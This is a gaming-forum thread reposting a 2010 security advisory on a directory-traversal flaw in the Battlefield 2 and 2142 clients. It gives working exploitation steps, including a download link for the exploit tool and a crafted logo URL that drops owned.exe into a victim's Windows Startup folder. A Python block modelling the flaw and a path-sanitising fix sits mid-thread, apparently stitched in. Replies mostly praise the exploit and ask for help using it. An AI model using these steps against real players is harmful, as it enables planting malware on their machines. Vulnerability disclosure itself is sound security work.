  1. #1
    cruizrisner

    Battlefield 2 and Battlefield 2142 Multiple Arbitrary file upload

    Code:
    ====================================================================
    EA Battlefield 2 and Battlefield 2142 Multiple Arbitrary File Upload 
    ====================================================================
    
    
    #######################################################################
     
    Luigi Auriemma
     
    Application: Refractor 2 engine
    Games: Battlefield 2 <= 1.50 (aka 1.5.3153-802.0)
    http://www.battlefield.ea.com/battlefield/bf2/
    Battlefield 2142 <= 1.50 (aka 1.10.48.0)
    http://battlefield.ea.com/battlefield/bf2142/
    ...
    other games developed with the same engine could be
    vulnerable like Battlefield Heroes
    Platforms: Windows
    Bug: client URLs directory traversal
    Exploitation: remote, versus clients
    Date: 29 Jun 2010
    Author: Luigi Auriemma
    e-mail: aluigi@autistici.org
    web: aluigi.org
     
     
    #######################################################################
     
     
    1) Introduction
    2) Bug
    3) The Code
    4) Fix
     
     
    #######################################################################
     
    ===============
    1) Introduction
    ===============
     
     
    The Battlefield series is one of the most famous and played series of
    games deeply devoted to multiplayer gaming.
    The series is developed by DICE (http://www.dice.se) and published by
    Electronic Arts.
     
     
    #######################################################################
     
    ======
    2) Bug
    ======
     
     
    Each BF2 and BF2142 server has some fields where the admin can specify
    the links to files and images like the sponsor and community logo.
    The sponsor logo is visible immediately when the client gets the list
    of servers and selects the server with the mouse (one-click, not join)
    while the second one is loaded when the client joins that server.
     
    There are also other URLs like DemoDownloadURL, DemoIndexURL and
    CustomMapsURL that can be exploited when the client joins the malicious
    server.
     
    The client performs a very simple operation: it gets the URL and
    downloads the file, saving it locally using its original name in the
    following folder:
    C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache\SERVER
    C:\Documents and Settings\USER\My Documents\Battlefield 2142\LogoCache\SERVER
    where USER is the Windows account of the current user and SERVER is the
    address of the web server, while LogoCache could be HttpCache if the
    URLs for downloading demos and maps are used.
     
    The vulnerability resides in the missing handling of the backslash char
    with the consequence that the name of the file will include the
    classical directory traversal pattern allowing a malicious server to
    upload malicious executables on the clients.
     
    Note that the loading of the URLs is automatic and it doesn't seem
    possible to disable this feature.
     
     
    #######################################################################
     
    ===========
    3) The Code
    ===========
     
     
    http://www.exploit-db.com/sploits/bfonlywebs.zip
     
    - launch: onlywebs.exe c:\malicious_file.exe
    - start the server launcher using the following string as sponsor and
    community logo URL:
    http://SERVER/..\..\..\..\Start Menu\Programs\Startup\owned.exe
    - Save and Start the server
    - launch the client and go in the multiplayer menu
    - when the refreshing of the list is terminated select or join the
    malicious server
    - now the file owned.exe will be available in the Startup folder of the
    client and will be executed at the next login or reboot
     
    note that the server might not be seen if you are running it on the
    same machine as the client (127.0.0.1); in that case use another
    computer/vm (a server or a UDP datapipe on port 29900)
     
     
    #######################################################################
     
    ======
    4) Fix
    ======
     
     
    No fix.
     
     
    #######################################################################
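
A defensive sketch of the file-name check the advisory says is missing, added here as an example and not code from the advisory or the game. `naive_cache_path` models the described behaviour (only `/` treated as a separator) and `safe_cache_path` rejects names that could leave the per-server cache folder; both function names are hypothetical, and Python's `ntpath` is used to get Windows path semantics on any OS.

```python
import ntpath
from urllib.parse import urlsplit, unquote

# Cache folder and URL are taken from the advisory text; function names are hypothetical.
CACHE_ROOT = r"C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache"
ADVISORY_URL = r"http://SERVER/..\..\..\..\Start Menu\Programs\Startup\owned.exe"
FORBIDDEN = set('\\/:*?"<>|')  # separators, drive/stream colon, Windows-invalid characters


def naive_cache_path(url):
    """Model of the described flaw: only '/' is treated as a path separator."""
    host = urlsplit(url).netloc
    name = url.rsplit("/", 1)[-1]  # backslashes survive inside the "file name"
    return ntpath.normpath(ntpath.join(CACHE_ROOT, host, name))


def safe_cache_path(url):
    """Return the cache path for url, or raise ValueError if it could leave the cache."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    # Decode first so %5C and %2F are checked as the characters they become.
    name = unquote(parts.path).rsplit("/", 1)[-1]
    for label, value in (("host", host), ("file name", name)):
        if not value or value in (".", "..") or value != value.strip(" ."):
            raise ValueError(f"rejected {label}: {value!r}")
        if FORBIDDEN & set(value) or any(ord(c) < 32 for c in value):
            raise ValueError(f"rejected {label}: {value!r}")
    root = ntpath.normpath(ntpath.join(CACHE_ROOT, host))
    candidate = ntpath.normpath(ntpath.join(root, name))
    # Defence in depth: the normalised result must still sit under the per-server folder.
    if ntpath.commonpath([root, candidate]) != root or candidate == root:
        raise ValueError(f"path escapes cache: {candidate!r}")
    return candidate


def is_rejected(url):
    """True when safe_cache_path refuses the URL."""
    try:
        safe_cache_path(url)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("naive :", naive_cache_path(ADVISORY_URL))
    print("safe  :", "rejected" if is_rejected(ADVISORY_URL) else "accepted")
    print("benign:", safe_cache_path("http://SERVER/img/logo.png"))
```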

  2. #2
    JussoFreshJr
    Nice Job, i could really use this

  3. #3
    ndawng
    WOW nice bro !

  4. #4
    jono12333
    i like it nice!

  5. #5
    pownd666
    is this the game??

  6. #6
    killer6
    dude this did not work....
    can u help me plz?
    like get a youtube vid or something...!!

  7. #7
    Niku ・( ̄∀ ̄)・
    Dude..don't bump at old thread please
    "Holding anger is a poison. It eats you from inside. We think that hating is a weapon that attacks the person who harmed us. But hatred is a curved blade. And the harms we do, we do to ourselves."-Mitch Albom

  8. #8
    Ghost
    Quote: Originally Posted by pownd666
    is this the game??
    nice bump brah


  9. #9
    §☻$oo$☻§
    Thanks love it!

  10. #10
    heythere123
    VERY GOOOD THIS IS AWESOME

  11. #11
    Niku ・( ̄∀ ̄)・
    both of u..stop bumping an old thread

  12. #12
    phoenix478
    very nicee ,

  13. #13
    Sxoxi
    Nice Job, i could really use this
